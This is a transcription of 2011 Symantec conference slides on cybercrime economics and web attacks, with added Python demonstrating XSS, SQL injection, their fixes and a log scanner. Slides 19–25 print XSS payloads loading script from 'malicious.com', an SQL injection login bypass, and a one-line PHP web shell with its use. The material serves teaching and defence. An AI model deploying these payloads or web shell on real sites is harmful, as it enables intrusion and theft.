Financial Risks to Internet Security

Martin Lee CISSP CEng and Dr. Les Pritchard CITP discuss the Costs and Financial Risks of Web Security at Symantec Vision 2011

Page 1: Financial Risks to Internet Security


Costs and Financial Risks of Web Security

Martin Lee CISSP CEng

Dr. Les Pritchard CITP

SR B03 - Costs and Financial Risks of Web Security

Page 2: Financial Risks to Internet Security

SYMANTEC VISION 2011

Where the Threats Come From.


Insider threats: mostly accidental data deletion.

Acts of God: fire, flood, volcanoes!

Malicious outsiders (cybercriminals): malware, banking trojans.


Page 3: Financial Risks to Internet Security

How the Bad Guys Make Money

Page 4: Financial Risks to Internet Security

Anyone’s Computer or Your Computer?

Botnets: compromising any computer. Denial of service attacks. Send spam. Steal data.

Banking trojans: compromising any computer. Internet bank robbery.

Targeted attacks: compromising specific systems. Stealing high value data.

Page 5: Financial Risks to Internet Security


Making Money From Botnets – Sending Spam

Traffic analysis of rogue website

26 days, 350 million spams, 28 sales

But, when scaled up

~$7000 in sales per day

~$2M per year

Source: C. Kanich et al., “Spamalytics: An Empirical Analysis of Spam Marketing Conversion”, Nov 2008 (http://www.icsi.berkeley.edu/pubs/networking/2008-ccs-spamalytics.pdf)


Page 6: Financial Risks to Internet Security

Making Money From Botnets – Denial of Service

Can hit 100 Gbit/s of attack traffic.

Estimated UK losses $3bn/yr.

Page 7: Financial Risks to Internet Security

Making Money From Banking Trojans

Source : http://www.wired.com/threatlevel/2010/10/zeus-ukraine-arrests/

Page 8: Financial Risks to Internet Security

Banking Trojans – Zeus Man-in-Browser Attack

Malware waits for you to log in to internet banking, then issues payments on your behalf to money mules.

Page 9: Financial Risks to Internet Security

Banking Trojans – Zeus Man-in-Browser Attack

Malware intercepts the data sent back from the bank, removes its own transfers, adjusts the balance, and shows you what you expect to see.

Page 10: Financial Risks to Internet Security

Distributing Web Malware

Gumblar lifecycle (diagram): the hacker controls a malware host and adds an XSS exploit to an unaffected website; a victim visits that website and is forwarded to the malware host, which installs malware; the malware steals the victim’s login details, which the hacker then uses to plant the exploit on the victim’s own website, and the cycle repeats.

Uploading web malware to your website by stealing your login details.

Page 11: Financial Risks to Internet Security

Malware on Legitimate Domains

Chart: malicious domains lifecycle, % remaining active over time (0 to 180 days), “Old” domains vs “New” domains.

Over time more than 80% of malicious domains are “Old” domains.


Page 12: Financial Risks to Internet Security

Employee Browsing Habits

Page 13: Financial Risks to Internet Security

Browsing Habits Outside of the Office

Chart: % of web blocks (y-axis) against % of users (x-axis), Mobile vs Office.

Page 14: Financial Risks to Internet Security


Distributing Web Malware – Advertising Services

Subvert a legitimate website (diagram): the advert slots on the web page are sold by the sales team, sold on by a reseller and resold further to advertisers, one of whom is a malware distributor.


Page 15: Financial Risks to Internet Security

Fake AV

Page 16: Financial Risks to Internet Security


Fake AV

Do the maths: 1 million products sold @ $39.95 = $39.95 million, less an $8.2 million fine = $31.75 million profit!

Source: http://www.pcworld.com/businesscenter/article/217987/alleged_scareware_vendors_to_pay_82_million_to_ftc.html


Page 17: Financial Risks to Internet Security

Attacking Your Website

Page 18: Financial Risks to Internet Security

My Website – XSS Example

www.example.com/index.php?page=cat&category=1&PHPSESSID=


Page 19: Financial Risks to Internet Security

My Website – XSS Example

www.example.com/index.php?page=cat&category=1&PHPSESSID=

becomes

www.example.com/index.php?page=cat&category=%3E%0A%3C%53%43%52%49%50%54%3E%61%6C%65%72%74%28%53%74%72%69%6E%67%2E%66%72%6F%6D

Attack JS – "><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>

URL encode it and replace the 'category' value with it.


Page 20: Financial Risks to Internet Security

My Website – XSS Example

Attacker can execute whatever they like:

Exploit – <script src="http://www.malicious.com/attack.js">

Redirect – window.location.href = "http://www.malicious.com/"

Why not? – document.product.price = "0.01"


Page 21: Financial Risks to Internet Security

XSS Example – Click that link

Email containing link

Embed link in discussion page

Discussion page (ENTER TEXT / SUBMIT form) with the posted comment:

I agree. <img src="/images/smiley.gif" onload="document.location='http://malicious/'">

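The following Python is an added example, not code from the deck: it builds the attack URL the way slide 19 describes (URL-encode the payload, put it in the 'category' value), renders that value into a page both raw and HTML-escaped, does the same for the stored <img onload> comment from slide 21, and then parses each rendering with the standard-library HTML parser to see which ones actually contain a script tag or an event handler. The page templates (a hidden input field, a <p> for the comment), the ActiveContentFinder check and the function names are assumptions for illustration; the hostnames and payloads are the deck's own.

```python
import html
from html.parser import HTMLParser
from urllib.parse import parse_qs, urlencode, urlsplit

# Payloads exactly as on the deck's slides 19 and 21.
REFLECTED_PAYLOAD = '"><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>'
STORED_PAYLOAD = ('I agree. <img src="/images/smiley.gif" '
                  'onload="document.location=\'http://malicious/\'">')


def attack_url(payload):
    """Slide 19's recipe: URL-encode the payload and use it as the 'category'
    value. urlencode leaves letters alone where the slide's hex encodes them
    too; both decode to the same string on the server."""
    return "http://www.example.com/index.php?" + urlencode(
        {"page": "cat", "category": payload})


def category_from(url):
    """What index.php sees after the web server decodes the query string."""
    return parse_qs(urlsplit(url).query)["category"][0]


def render_category_vulnerable(url):
    """Assumed page template: the parameter is reflected straight into an
    attribute, which is what lets "> break out and start a new tag."""
    return '<input type="hidden" name="category" value="%s">' % category_from(url)


def render_category_safe(url):
    """Same template with the value HTML-escaped (quote=True also escapes ")."""
    return ('<input type="hidden" name="category" value="%s">'
            % html.escape(category_from(url), quote=True))


def render_comment(text, escape):
    """Assumed discussion-page template for slide 21's stored payload."""
    return "<p>%s</p>" % (html.escape(text) if escape else text)


class ActiveContentFinder(HTMLParser):
    """Records script tags and on* event-handler attributes the browser-side
    parser would actually see; escaped text never produces either."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.findings.append("<script>")
        for name, _value in attrs:
            if name.startswith("on"):
                self.findings.append("%s@%s" % (name, tag))


def active_content(markup):
    """List of script tags / event handlers found in the rendered markup."""
    parser = ActiveContentFinder()
    parser.feed(markup)
    parser.close()
    return parser.findings


if __name__ == "__main__":
    url = attack_url(REFLECTED_PAYLOAD)
    print(url)
    print("reflected, raw:    ", active_content(render_category_vulnerable(url)))
    print("reflected, escaped:", active_content(render_category_safe(url)))
    print("stored, raw:       ", active_content(render_comment(STORED_PAYLOAD, False)))
    print("stored, escaped:   ", active_content(render_comment(STORED_PAYLOAD, True)))
```

The check is deliberately done on the rendered page rather than on the input: the fix the deck implies is output encoding at the point where untrusted data meets markup, and that is the only place where it can be verified for every path the data takes.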

Page 22: Financial Risks to Internet Security

SQL Injection – “Little Bobby Tables”

Source: XKCD Comic - http://xkcd.com/327/

Page 23: Financial Risks to Internet Security

My Website – SQL Injection Example

SQL injection:

Select * from users where username = "$input" and password=md5($password);

$input = 'admin"; -- '

Select * from users where username = "admin"; -- ... ignored

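An added runnable version of this slide, not the deck's code: the same login query against an in-memory SQLite database, first built by string interpolation as on the slide and then with bound parameters. SQLite uses single quotes for string literals where the deck's MySQL used double quotes, so the payload becomes admin'; -- with the trailing comment still swallowing the password check. The user table, passwords and function names are constructed for this example; md5 is kept only because the slide uses it.

```python
import hashlib
import sqlite3

# Constructed sample accounts (not real data); the slide only names "admin".
USERS = [
    ("admin", hashlib.md5(b"correct horse").hexdigest()),
    ("martin", hashlib.md5(b"battery staple").hexdigest()),
]

# The deck's payload with the quote swapped for SQLite's single-quoted strings.
# "-- " comments out the rest of the statement, i.e. the password check.
PAYLOAD = "admin'; -- "


def make_db():
    """In-memory SQLite database shaped like the deck's users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", USERS)
    return conn


def vulnerable_sql(username, password):
    """Build the query by string interpolation, exactly the slide's mistake.
    md5 mirrors the slide's password scheme only."""
    pw_hash = hashlib.md5(password.encode()).hexdigest()
    return ("SELECT username FROM users WHERE username = '%s' "
            "AND password = '%s'" % (username, pw_hash))


def login_vulnerable(conn, username, password):
    """Account name the database logged us in as, or None."""
    row = conn.execute(vulnerable_sql(username, password)).fetchone()
    return row[0] if row else None


def login_safe(conn, username, password):
    """Same check with bound parameters: the driver sends the input as a
    value, so quotes and comment markers inside it can never become SQL."""
    pw_hash = hashlib.md5(password.encode()).hexdigest()
    row = conn.execute(
        "SELECT username FROM users WHERE username = ? AND password = ?",
        (username, pw_hash),
    ).fetchone()
    return row[0] if row else None


def demo():
    """Run the payload through both versions, plus a real login through the safe one."""
    conn = make_db()
    return {
        "injected_query": vulnerable_sql(PAYLOAD, "anything"),
        "vulnerable": login_vulnerable(conn, PAYLOAD, "anything"),  # -> "admin"
        "safe": login_safe(conn, PAYLOAD, "anything"),              # -> None
        "legit": login_safe(conn, "admin", "correct horse"),        # -> "admin"
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print("%-15s %r" % (key, value))
```

Printing the injected query string is the quickest way to show a developer why escaping by hand is the wrong fix: the statement the database receives ends at the attacker's semicolon, and everything the application appended after it is a comment.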

Page 24: Financial Risks to Internet Security

My Website – SQL Injection Example

How about a file like this?

<? system($_REQUEST['cmd']); ?>


Page 25: Financial Risks to Internet Security

My Website – Now completely at mercy of attacker

ls -l -> %6C%73%20%2D%6C

http://www.example.com/images/shell.php?cmd=%6C%73%20%2D%6C

total 36
-rw-rw-r-- 1 martin martin  191 Nov 27  2003 categories.php
drwxrwxr-x 2 martin martin 4096 Mar 16 17:53 inc
-rw-rw-r-- 1 martin martin  543 Mar 29 14:54 index.old
-rw-r--r-- 1 martin martin  124 Mar 29 15:03 index.php
-rw-rw-r-- 1 martin martin  537 Mar 29 14:41 index.php~
-rw-rw-r-- 1 martin martin 2068 Mar 29 16:20 product_image.php
-rw-rw-r-- 1 martin martin 1924 Nov 28  2003 product_image.php~
-rw-rw-r-- 1 martin martin  189 Nov 27  2003 products.php
-rw-r--r-- 1 martin martin   31 Mar 29 15:04 shell.php


Page 26: Financial Risks to Internet Security

Vulnerable Websites

Skilled attackers can easily find vulnerabilities.

Others can use a list of vulnerable websites.


Page 27: Financial Risks to Internet Security

How You Lose Money

Page 28: Financial Risks to Internet Security


Data Breach Losses

• Ponemon Institute & Symantec Research

– Average cost per data breach $7.2 million.

– $214 per breached record.

– 31% of breaches are malicious or criminal attack.

– Malicious attacks cost more: $318 per breached record.


See: http://www.symantec.com/about/news/release/article.jsp?prid=20110308_01

Calculate your risk: http://databreachcalculator.com/


Page 29: Financial Risks to Internet Security


Symantec SMB Survey – What do SMBs suffer?

Chart (% of SMBs, 0 to 60%): environment downtime; corporate data theft; customer or employee PI theft; customer financial information theft; intellectual property theft.


Page 30: Financial Risks to Internet Security

Protecting Yourself.

Page 31: Financial Risks to Internet Security

Know Your Assets, Know Attack Vectors

Page 32: Financial Risks to Internet Security

Layers of Protection Provide Maximum Detection

Page 33: Financial Risks to Internet Security

Test & Monitor Your Web Services

Find & fix vulnerabilities in your web services.

Monitor logs to identify attacks, block the attacker.

You don’t need to be perfect, just better than your competitors.
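As an added example of the "monitor logs" point (not the deck's code), the Python below is a small scanner over constructed Apache-style access log lines that replay the deck's reflected-XSS, shell.php and SQL-injection requests alongside benign traffic. It percent-decodes each request (repeatedly, so double encoding does not slip past), applies three rules and returns the client addresses to block. The log lines, the client addresses (RFC 5737 documentation ranges), the rule patterns and the /images/ upload directory are all assumptions; the patterns need tuning against real traffic before they drive an automatic block.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# Constructed Apache common-format log lines (not real traffic). The client
# addresses are RFC 5737 documentation ranges. Lines 2, 3 and 4 replay the
# deck's reflected-XSS, shell.php and SQL-injection requests; the rest are benign.
LOG_LINES = [
    '192.0.2.44 - - [29/Mar/2011:15:03:58 +0100] "GET /index.php?page=cat&category=1 HTTP/1.1" 200 2048',
    '203.0.113.7 - - [29/Mar/2011:15:04:31 +0100] "GET /index.php?page=cat&category=%22%3E%3C%53%43%52%49%50%54%3E%61%6C%65%72%74%28%31%29%3C%2F%53%43%52%49%50%54%3E HTTP/1.1" 200 2101',
    '198.51.100.23 - - [29/Mar/2011:15:05:02 +0100] "GET /images/shell.php?cmd=%6C%73%20%2D%6C HTTP/1.1" 200 612',
    '198.51.100.77 - - [29/Mar/2011:15:05:40 +0100] "GET /login.php?user=admin%27%3B+--+&pw=x HTTP/1.1" 302 0',
    '192.0.2.44 - - [29/Mar/2011:15:06:03 +0100] "POST /login.php HTTP/1.1" 200 311',
]

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# Detection rules (assumptions to tune against your own traffic: the on*=
# pattern, for instance, also hits a benign parameter named "option").
XSS_RE = re.compile(r"<\s*script|\bon[a-z]+\s*=|javascript:", re.I)
SQLI_RE = re.compile(r"'\s*(or|and)\b|'\s*;|--\s|union\s+select", re.I)
UPLOAD_DIRS = ("/images/",)  # assumed directories that should serve static files only


def decode(component):
    """Percent-decode until the text stops changing (max three passes), so a
    double-encoded %2573 still comes out as "s" and meets the rules."""
    for _ in range(3):
        step = unquote_plus(component)
        if step == component:
            break
        component = step
    return component


def classify(path, query):
    """Names of the rules that fire for one decoded path and query string."""
    rules = []
    if XSS_RE.search(query):
        rules.append("xss")
    if SQLI_RE.search(query):
        rules.append("sqli")
    if path.endswith(".php") and path.startswith(UPLOAD_DIRS):
        rules.append("webshell")  # a script executing from an upload directory
    return rules


def scan(lines):
    """(ip, rule, decoded request) for every rule that fires on every line."""
    findings = []
    for line in lines:
        match = LOG_RE.match(line)
        if not match:
            continue  # unparseable line: record it elsewhere rather than trust it
        parts = urlsplit(match["target"])  # split first so a decoded '#' cannot hide the query
        path, query = decode(parts.path), decode(parts.query)
        request = path + ("?" + query if query else "")
        for rule in classify(path, query):
            findings.append((match["ip"], rule, request))
    return findings


def ips_to_block(lines):
    """Distinct client addresses with at least one finding, ready for a blocklist."""
    return sorted({ip for ip, _rule, _request in scan(lines)})


if __name__ == "__main__":
    for ip, rule, request in scan(LOG_LINES):
        print("%-15s %-8s %s" % (ip, rule, request))
    print("block:", ips_to_block(LOG_LINES))
```

Decoding before matching is the part that matters: the shell.php request on slide 25 carries its command as %6C%73%20%2D%6C, and a rule that looks for "ls" or "cmd=" in the raw line never fires. The webshell rule also does not depend on the file name, since an attacker can call the dropped file anything; what gives it away is PHP executing out of a directory that should only ever serve images.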

Page 34: Financial Risks to Internet Security

Thank you!

Copyright © 2011 Symantec Corporation. All rights reserved.

Martin Lee

[email protected]

+44 1452 627 042
